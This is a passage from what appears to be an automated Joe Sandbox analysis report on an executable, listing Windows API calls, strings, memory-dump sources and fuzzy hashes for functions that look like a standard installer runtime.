                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressHandleModuleProcProcessThreadWindow
                                                                                        • String ID: AllowSetForegroundWindow$user32.dll
                                                                                        • API String ID: 1782028327-3855017861
                                                                                        • Opcode ID: 0c48b0152dcd94fde7082f0574e48419f86d5c04df14efc0ca492c8631bf730a
                                                                                        • Instruction ID: d51ed2a8d8be4cb67b0f2e6afaff03014389f5b4c9f6752a27b175deb1fe6994
                                                                                        • Opcode Fuzzy Hash: 0c48b0152dcd94fde7082f0574e48419f86d5c04df14efc0ca492c8631bf730a
                                                                                        • Instruction Fuzzy Hash: D7D0C790248701B9D910B3F64D46E9F3A5D894471CB50C47BB418E61C5DA7CFD04893D
                                                                                        APIs
                                                                                        • BeginPaint.USER32(00000000,?), ref: 00416C52
                                                                                        • SaveDC.GDI32(?), ref: 00416C83
                                                                                        • ExcludeClipRect.GDI32(?,?,?,?,?,?,00000000,00416D45), ref: 00416CE4
                                                                                        • RestoreDC.GDI32(?,?), ref: 00416D0B
                                                                                        • EndPaint.USER32(00000000,?,00416D4C,00000000,00416D45), ref: 00416D3F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: Paint$BeginClipExcludeRectRestoreSave
                                                                                        • String ID:
                                                                                        • API String ID: 3808407030-0
                                                                                        • Opcode ID: ad781fe6fb59047a66b80eb53a3f65b2019eba16d1c733f202b60e39d660354f
                                                                                        • Instruction ID: 8164e3b37c2b38cc39b91ef4074089abf19b8963c3e0e5cbd12a4ce3d65b1abe
                                                                                        • Opcode Fuzzy Hash: ad781fe6fb59047a66b80eb53a3f65b2019eba16d1c733f202b60e39d660354f
                                                                                        • Instruction Fuzzy Hash: A1415070A002049FCB14DBA9C585FAA77F9FF48304F1540AEE8459B362D778DD81CB58
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b6913cb722474124f75cff2ee5949f067bbdde1b56a592e148b6496e85af3d5a
                                                                                        • Instruction ID: a833d86c80f2fb81cba799e3b93fc1891ddf3ebdd98a67124a25423b7ab76754
                                                                                        • Opcode Fuzzy Hash: b6913cb722474124f75cff2ee5949f067bbdde1b56a592e148b6496e85af3d5a
                                                                                        • Instruction Fuzzy Hash: 563132746057809FC320EF69C984B9BB7E8AF89354F04491EF9D5C3752C638E8818F19
                                                                                        APIs
                                                                                        • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429808
                                                                                        • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429837
                                                                                        • SendMessageA.USER32(00000000,000000C1,00000000,00000000), ref: 00429853
                                                                                        • SendMessageA.USER32(00000000,000000B1,00000000,00000000), ref: 0042987E
                                                                                        • SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 0042989C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID:
                                                                                        • API String ID: 3850602802-0
                                                                                        • Opcode ID: 399f588db94bb8b810bf5b46e1237ea7bfd7cbebe0e15a3dbf36720fb68daebb
                                                                                        • Instruction ID: 8b65b0e689063cc909dba6714575951256d1ad54ff8cece17fd29570ea6901c2
                                                                                        • Opcode Fuzzy Hash: 399f588db94bb8b810bf5b46e1237ea7bfd7cbebe0e15a3dbf36720fb68daebb
                                                                                        • Instruction Fuzzy Hash: 6E219D707107057BEB10AB62DC82F5B7AECAB41708F54443EB501AB2D2DFB8AE418228
                                                                                        APIs
                                                                                        • GetSystemMetrics.USER32(0000000B), ref: 0041BBCA
                                                                                        • GetSystemMetrics.USER32(0000000C), ref: 0041BBD4
                                                                                        • GetDC.USER32(00000000), ref: 0041BC12
                                                                                        • CreateDIBitmap.GDI32(00000000,?,00000004,?,?,00000000), ref: 0041BC59
                                                                                        • DeleteObject.GDI32(00000000), ref: 0041BC9A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: MetricsSystem$BitmapCreateDeleteObject
                                                                                        • String ID:
                                                                                        • API String ID: 1095203571-0
                                                                                        • Opcode ID: d6ecec59309c4539c21f746b1d4641e0a999657a412e1d938322a226e3514674
                                                                                        • Instruction ID: 2a907a32995036c4e239f44386a828d3a2f1e7d44945ead90e55d18394f4d4ff
                                                                                        • Opcode Fuzzy Hash: d6ecec59309c4539c21f746b1d4641e0a999657a412e1d938322a226e3514674
                                                                                        • Instruction Fuzzy Hash: 5D315C70E00208EFDB04DFA5C941AAEB7F5EB48700F2084AAF514AB781D7789E40DB98
                                                                                        APIs
                                                                                          • Part of subcall function 0045D04C: SetLastError.KERNEL32(00000057,00000000,0045D118,?,?,?,?,00000000), ref: 0045D0B7
                                                                                        • GetLastError.KERNEL32(00000000,00000000,00000000,004736AC,?,?,0049C1E0,00000000), ref: 00473665
                                                                                        • GetLastError.KERNEL32(00000000,00000000,00000000,004736AC,?,?,0049C1E0,00000000), ref: 0047367B
                                                                                        Strings
                                                                                        • Failed to set permissions on registry key (%d)., xrefs: 0047368C
                                                                                        • Setting permissions on registry key: %s\%s, xrefs: 0047362A
                                                                                        • Could not set permissions on the registry key because it currently does not exist., xrefs: 0047366F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast
                                                                                        • String ID: Could not set permissions on the registry key because it currently does not exist.$Failed to set permissions on registry key (%d).$Setting permissions on registry key: %s\%s
                                                                                        • API String ID: 1452528299-4018462623
                                                                                        • Opcode ID: 2cd14b75b874af61ac3d45831295ca4897b993e1bd4af745d48f10d6dc1171d0
                                                                                        • Instruction ID: ad6b00cc897a6d1501f3fc6a2a631de3da5dc8c6e7b4eccdfad28332e4495c63
                                                                                        • Opcode Fuzzy Hash: 2cd14b75b874af61ac3d45831295ca4897b993e1bd4af745d48f10d6dc1171d0
                                                                                        • Instruction Fuzzy Hash: A121C870A046445FCB10DFA9C8826EEBBE4DF49319F50817BE408E7392D7785E098B6D
                                                                                        APIs
                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                        • SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403CFC
                                                                                        • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00403D06
                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403D15
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharMultiWide$AllocString
                                                                                        • String ID:
                                                                                        • API String ID: 262959230-0
                                                                                        • Opcode ID: dcd45591e65b03bd276bb2a5b0fabad56ebf76f0c081827c2345b0a7b763a240
                                                                                        • Instruction ID: 657f84db466bd1c54801a2b30447fc2084338491f8142acf58a262d5883cef98
                                                                                        • Opcode Fuzzy Hash: dcd45591e65b03bd276bb2a5b0fabad56ebf76f0c081827c2345b0a7b763a240
                                                                                        • Instruction Fuzzy Hash: FCF0A4917442043BF21025A65C43F6B198CCB82B9BF50053FB704FA1D2D87C9D04427D
                                                                                        APIs
                                                                                        • SelectPalette.GDI32(00000000,00000000,00000000), ref: 00414419
                                                                                        • RealizePalette.GDI32(00000000), ref: 00414421
                                                                                        • SelectPalette.GDI32(00000000,00000000,00000001), ref: 00414435
                                                                                        • RealizePalette.GDI32(00000000), ref: 0041443B
                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00414446
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: Palette$RealizeSelect$Release
                                                                                        • String ID:
                                                                                        • API String ID: 2261976640-0
                                                                                        • Opcode ID: c9c8aa66f6917016d7555c0ac5b3df2d15848593dde74026b2272496f15e705b
                                                                                        • Instruction ID: 3cc421e061c7a323c9855e33cbe13bf4890882f9e8533d15179bd5f7679f66d2
                                                                                        • Opcode Fuzzy Hash: c9c8aa66f6917016d7555c0ac5b3df2d15848593dde74026b2272496f15e705b
                                                                                        • Instruction Fuzzy Hash: A2018F7520C3806AE600A63D8C85A9F6BED9FCA718F15446EF495DB282DA7AC8018765
                                                                                        APIs
                                                                                          • Part of subcall function 0041F074: GetActiveWindow.USER32 ref: 0041F077
                                                                                          • Part of subcall function 0041F074: GetCurrentThreadId.KERNEL32 ref: 0041F08C
                                                                                          • Part of subcall function 0041F074: EnumThreadWindows.USER32(00000000,Function_0001F050), ref: 0041F092
                                                                                          • Part of subcall function 004231A8: GetSystemMetrics.USER32(00000000), ref: 004231AA
                                                                                        • OffsetRect.USER32(?,?,?), ref: 00424DC9
                                                                                        • DrawTextA.USER32(00000000,00000000,000000FF,?,00000C10), ref: 00424E8C
                                                                                        • OffsetRect.USER32(?,?,?), ref: 00424E9D
                                                                                          • Part of subcall function 00423564: GetCurrentThreadId.KERNEL32 ref: 00423579
                                                                                          • Part of subcall function 00423564: SetWindowsHookExA.USER32(00000003,00423520,00000000,00000000), ref: 00423589
                                                                                          • Part of subcall function 00423564: CreateThread.KERNEL32(00000000,000003E8,004234D0,00000000,00000000), ref: 004235AD
                                                                                          • Part of subcall function 00424B2C: SetTimer.USER32(00000000,00000001,?,004234B4), ref: 00424B47
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: Thread$CurrentOffsetRectWindows$ActiveCreateDrawEnumHookMetricsSystemTextTimerWindow
                                                                                        • String ID: vLB
                                                                                        • API String ID: 1477829881-1797516613
                                                                                        • Opcode ID: af4d35ceb7da7411f9a909d8da5f62e109762c4c9dbecdeb02cfa42cc05a337b
                                                                                        • Instruction ID: 1a85cd152e58b5c2614c87f396891e2b5808bef0cf689969089b0637ec596c27
                                                                                        • Opcode Fuzzy Hash: af4d35ceb7da7411f9a909d8da5f62e109762c4c9dbecdeb02cfa42cc05a337b
                                                                                        • Instruction Fuzzy Hash: C5812675A003188FCB14DFA8D880ADEBBF4FF88314F50416AE905AB296E738AD45CF44
                                                                                        APIs
                                                                                        • WNetGetUniversalNameA.MPR(00000000,00000001,?,00000400), ref: 00407003
                                                                                        • WNetOpenEnumA.MPR(00000001,00000001,00000000,00000000,?), ref: 0040707D
                                                                                        • WNetEnumResourceA.MPR(?,FFFFFFFF,?,?), ref: 004070D5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: Enum$NameOpenResourceUniversal
                                                                                        • String ID: Z
                                                                                        • API String ID: 3604996873-1505515367
                                                                                        • Opcode ID: a9e747af3270ad6827a26b5e12e82ea9da9777e5f51a79d453bfa0d7b97e4fbe
                                                                                        • Instruction ID: 78f4b6eea80f90a9c0d6dbacb1000d6f5057f9b0a0312f2c839bfa0eabc808a5
                                                                                        • Opcode Fuzzy Hash: a9e747af3270ad6827a26b5e12e82ea9da9777e5f51a79d453bfa0d7b97e4fbe
                                                                                        • Instruction Fuzzy Hash: 14516470E04208AFDB11DF95C951AAFBBB9EF09304F1045BAE500BB3D1D778AE458B5A
                                                                                        APIs
                                                                                        • SetRectEmpty.USER32(?), ref: 0044D04E
                                                                                        • DrawTextA.USER32(00000000,00000000,00000000,?,00000D20), ref: 0044D079
                                                                                        • DrawTextA.USER32(00000000,00000000,00000000,00000000,00000800), ref: 0044D101
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: DrawText$EmptyRect
                                                                                        • String ID:
                                                                                        • API String ID: 182455014-2867612384
                                                                                        • Opcode ID: 9cefa38d4a8adbc35dceb9fbd70f94003a2f7c245499b58eac7a7a86e34dc042
                                                                                        • Instruction ID: ac611c4ae9e9b4e435f74cd3b872a097dcdbbef8ea8fa2dc8c743a2ef399c877
                                                                                        • Opcode Fuzzy Hash: 9cefa38d4a8adbc35dceb9fbd70f94003a2f7c245499b58eac7a7a86e34dc042
                                                                                        • Instruction Fuzzy Hash: 18517171E00248AFDB11DFA5C885BDEBBF8BF48308F18447AE845EB252D7789945CB64
                                                                                        APIs
                                                                                        • GetDC.USER32(00000000), ref: 0042EF9E
                                                                                          • Part of subcall function 0041A1E8: CreateFontIndirectA.GDI32(?), ref: 0041A2A7
                                                                                        • SelectObject.GDI32(?,00000000), ref: 0042EFC1
                                                                                        • ReleaseDC.USER32(00000000,?), ref: 0042F0A0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateFontIndirectObjectReleaseSelect
                                                                                        • String ID: ...\
                                                                                        • API String ID: 3133960002-983595016
                                                                                        • Opcode ID: 174dea87e3c77845355dc2bffde9c2636390ac865bcfddee608935e642ca7c05
                                                                                        • Instruction ID: de545d42c11d103cbad381cc3223c2b5efa9fdb4a6e9ae4bb0445229962d8c70
                                                                                        • Opcode Fuzzy Hash: 174dea87e3c77845355dc2bffde9c2636390ac865bcfddee608935e642ca7c05
                                                                                        • Instruction Fuzzy Hash: 5A316370B00128AFDB11EB96D841BAEB7F8EB09348F90447BE410A7392D7785E49CA59
                                                                                        APIs
                                                                                        • GetClassInfoA.USER32(00400000,?,?), ref: 0041647F
                                                                                        • UnregisterClassA.USER32(?,00400000), ref: 004164AB
                                                                                        • RegisterClassA.USER32(?), ref: 004164CE
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: Class$InfoRegisterUnregister
                                                                                        • String ID: @
                                                                                        • API String ID: 3749476976-2766056989
                                                                                        • Opcode ID: 32c7bff64fe8078beb5c73cee1a3f36bf3645a98757bc26b4be27a2261280048
                                                                                        • Instruction ID: c77080f262680b7bd3c4c6a37e0a11d074b1995aa9dd52ebf92fb76dd285a693
                                                                                        • Opcode Fuzzy Hash: 32c7bff64fe8078beb5c73cee1a3f36bf3645a98757bc26b4be27a2261280048
                                                                                        • Instruction Fuzzy Hash: B8316D702042409BD720EF69C981B9B77E5AB89308F04457FF949DB392DB39DD44CB6A
                                                                                        APIs
                                                                                        • GetFileAttributesA.KERNEL32(00000000,00498B60,00000000,00498306,?,?,00000000,0049B628), ref: 00498280
                                                                                        • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00498B60,00000000,00498306,?,?,00000000,0049B628), ref: 004982A9
                                                                                        • MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 004982C2
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$Attributes$Move
                                                                                        • String ID: isRS-%.3u.tmp
                                                                                        • API String ID: 3839737484-3657609586
                                                                                        • Opcode ID: 6425da845d9cf075168c9006b2f4cde8adeeb665172db9fe24e9d2d56fbf6a76
                                                                                        • Instruction ID: fc33356634acd7bce8b4c2965ae56e8bcff63ef6fc68eceab8a95db248f88364
                                                                                        • Opcode Fuzzy Hash: 6425da845d9cf075168c9006b2f4cde8adeeb665172db9fe24e9d2d56fbf6a76
                                                                                        • Instruction Fuzzy Hash: 0B216471E00609ABCF10EFA9C8819AFBBB8AF45714F10457FB814B72D1DB389E018A59
                                                                                        APIs
                                                                                        • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00404DC5
                                                                                        • ExitProcess.KERNEL32 ref: 00404E0D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExitMessageProcess
                                                                                        • String ID: Error$Runtime error at 00000000
                                                                                        • API String ID: 1220098344-2970929446
                                                                                        • Opcode ID: 4aa0907dffceb0697d192a833af99b379258e6819ee5eddde657f3822e72bbb6
                                                                                        • Instruction ID: e2df0dcbf1ce8e07228a8ae3c957e3f7be2bf5582065763199918d440bd3f461
                                                                                        • Opcode Fuzzy Hash: 4aa0907dffceb0697d192a833af99b379258e6819ee5eddde657f3822e72bbb6
                                                                                        • Instruction Fuzzy Hash: 8E219560A442414ADB11A779BA8571B3B91D7E5348F04817BE710A73E3C77C8C4487ED
                                                                                        APIs
                                                                                          • Part of subcall function 0042C804: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C828
                                                                                          • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                          • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                                        • LoadTypeLib.OLEAUT32(00000000,00000000), ref: 00456C50
                                                                                        • RegisterTypeLib.OLEAUT32(00000000,00000000,00000000), ref: 00456C7D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: Type$AllocByteCharFullLoadMultiNamePathRegisterStringWide
                                                                                        • String ID: LoadTypeLib$RegisterTypeLib
                                                                                        • API String ID: 1312246647-2435364021
                                                                                        • Opcode ID: 99adc2ab1761f2fa15f1ac99c5dc87c93e60f5f8f6cafab150dd189b668492eb
